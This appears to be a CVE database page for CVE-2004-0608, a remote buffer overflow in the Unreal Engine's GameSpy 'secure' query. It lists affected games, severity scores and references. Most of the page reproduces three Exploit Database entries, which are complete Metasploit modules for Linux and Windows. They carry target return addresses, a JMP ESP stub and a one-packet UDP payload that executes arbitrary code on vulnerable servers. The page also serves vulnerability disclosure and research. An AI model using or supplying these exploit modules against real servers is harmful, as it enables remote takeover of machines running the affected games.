CVE-2004-0608 : Detail

CVE-2004-0608

60.18%V4
Network
2004-06-30
02h00 +00:00
2017-07-10
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Unreal Engine, as used in DeusEx 1.112fm and earlier, Devastation 390 and earlier, Mobile Forces 20000 and earlier, Nerf Arena Blast 1.2 and earlier, Postal 2 1337 and earlier, Rune 107 and earlier, Tactical Ops 3.4.0 and earlier, Unreal 1 226f and earlier, Unreal II XMP 7710 and earlier, Unreal Tournament 451b and earlier, Unreal Tournament 2003 2225 and earlier, Unreal Tournament 2004 before 3236, Wheel of Time 333b and earlier, and X-com Enforcer, allows remote attackers to execute arbitrary code via a UDP packet containing a secure query with a long value, which overwrites memory.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 16848

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)', 'Description' => %q{ This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times. }, 'Author' => [ 'onetwo' ], 'License' => BSD_LICENSE, 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2004-0608'], [ 'OSVDB', '7217'], [ 'BID', '10570'], ], 'Privileged' => true, 'Payload' => { 'Space' => 512, 'BadChars' => "\x5c\x00", }, 'Platform' => 'linux', 'Targets' => [ ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }], ], 'DisclosureDate' => 'Jun 18 2004')) register_options( [ Opt::RPORT(7787) ], self.class) end def exploit connect_udp buf = make_nops(1024) buf[24, 4] = [target['Rets'][1]].pack('V') buf[44, 4] = [target['Rets'][0]].pack('V') buf[56, 4] = [target['Rets'][1]].pack('V') buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP buf[0, 8] = "\\secure\\" buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded udp_sock.put(buf) handler disconnect_udp end def ut_version connect_udp udp_sock.put("\\basic\\") res = udp_sock.recvfrom(8192) disconnect_udp if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/))) return m[1] end return end def check vers = ut_version if (not vers) print_status("Could not detect Unreal Tournament Server") return end print_status("Detected Unreal Tournament Server Version: #{vers}") if (vers =~ /^(3120|3186|3204)$/) print_status("This system appears to be exploitable") return Exploit::CheckCode::Appears end if (vers =~ /^(2...)$/) print_status("This system appears to be running UT2003") return Exploit::CheckCode::Detected end print_status("This system appears to be patched") return Exploit::CheckCode::Safe end end
Exploit Database EDB-ID : 10032

Publication date : 2004-07-17 22h00 +00:00
Author : onetwo
EDB Verified : Yes

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)', 'Description' => %q{ This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times. }, 'Author' => [ 'onetwo' ], 'License' => BSD_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0608'], [ 'OSVDB', '7217'], [ 'BID', '10570'], ], 'Privileged' => true, 'Payload' => { 'Space' => 512, 'BadChars' => "\x5c\x00", }, 'Platform' => 'linux', 'Targets' => [ ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }], ], 'DisclosureDate' => 'Jun 18 2004')) register_options( [ Opt::RPORT(7787) ], self.class) end def exploit connect_udp buf = make_nops(1024) buf[24, 4] = [target['Rets'][1]].pack('V') buf[44, 4] = [target['Rets'][0]].pack('V') buf[56, 4] = [target['Rets'][1]].pack('V') buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP buf[0, 8] = "\\secure\\" buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded udp_sock.put(buf) handler disconnect_udp end def ut_version connect_udp udp_sock.put("\\basic\\") res = udp_sock.recvfrom(8192) disconnect_udp if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/))) return m[1] end return end def check vers = ut_version if (not vers) print_status("Could not detect Unreal Tournament Server") return end print_status("Detected Unreal Tournament Server Version: #{vers}") if (vers =~ /^(3120|3186|3204)$/) print_status("This system appears to be exploitable") return Exploit::CheckCode::Appears end if (vers =~ /^(2...)$/) print_status("This system appears to be running UT2003") return Exploit::CheckCode::Detected end print_status("This system appears to be patched") return Exploit::CheckCode::Safe end end
Exploit Database EDB-ID : 16693

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'Unreal Tournament 2004 "secure" Overflow (Win32)', 'Description' => %q{ This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times. }, 'Author' => [ 'stinko' ], 'License' => BSD_LICENSE, 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2004-0608'], [ 'OSVDB', '7217'], [ 'BID', '10570'], ], 'Privileged' => true, 'Payload' => { 'Space' => 512, 'BadChars' => "\x5c\x00", }, 'Platform' => 'win', 'Targets' => [ ['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp ], 'DisclosureDate' => 'Jun 18 2004', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(7787) ], self.class) end def exploit connect_udp buf = make_nops(1024) buf[0, 60] = [target['Rets'][0]].pack('V') * 15 buf[54, 4] = [target['Rets'][1]].pack('V') buf[0, 8] = "\\secure\\" buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded udp_sock.put(buf) handler disconnect_udp end def ut_version connect_udp udp_sock.put("\\basic\\") res = udp_sock.recvfrom(8192) disconnect_udp if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/))) return m[1] end return end def check vers = ut_version if (not vers) print_status("Could not detect Unreal Tournament Server") return end print_status("Detected Unreal Tournament Server Version: #{vers}") if (vers =~ /^(3120|3186|3204)$/) print_status("This system appears to be exploitable") return Exploit::CheckCode::Appears end if (vers =~ /^(2...)$/) print_status("This system appears to be running UT2003") return Exploit::CheckCode::Detected end print_status("This system appears to be patched") return Exploit::CheckCode::Safe end end

Products Mentioned

Configuraton 0

Arush>>Devastation >> Version 390.0

    Dreamforge>>Tnn_outdoors_pro_hunter >> Version *

      Epic_games>>Unreal_engine >> Version 226f

        Epic_games>>Unreal_engine >> Version 433

          Epic_games>>Unreal_engine >> Version 436

            Epic_games>>Unreal_tournament >> Version 451b

              Epic_games>>Unreal_tournament_2003 >> Version 2199_linux

                Epic_games>>Unreal_tournament_2003 >> Version 2199_macos

                  Epic_games>>Unreal_tournament_2003 >> Version 2199_win32

                    Epic_games>>Unreal_tournament_2003 >> Version 2225_macos

                      Epic_games>>Unreal_tournament_2003 >> Version 2225_win32

                        Epic_games>>Unreal_tournament_2004 >> Version macos

                          Epic_games>>Unreal_tournament_2004 >> Version win32

                            Infogrames>>Tacticalops >> Version 3.4

                              Infogrames>>X-com_enforcer >> Version *

                                Ion_storm>>Deusex >> Version 1.112_fm

                                  Nerf_arena_blast>>Nerf_arena_blast >> Version 1.2

                                    Rage_software>>Mobile_forces >> Version 20000.0

                                      Robert_jordan>>Wheel_of_time >> Version 333.0b

                                        Running_with_scissors>>Postal_2 >> Version 1337

                                          Configuraton 0

                                          Gentoo>>Linux >> Version 1.4

                                          References

                                          http://www.securityfocus.com/bid/10570
                                          Tags : vdb-entry, x_refsource_BID
                                          http://www.gentoo.org/security/en/glsa/glsa-200407-14.xml
                                          Tags : vendor-advisory, x_refsource_GENTOO
                                          http://marc.info/?l=bugtraq&m=108787105023304&w=2
                                          Tags : mailing-list, x_refsource_BUGTRAQ
                                          The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.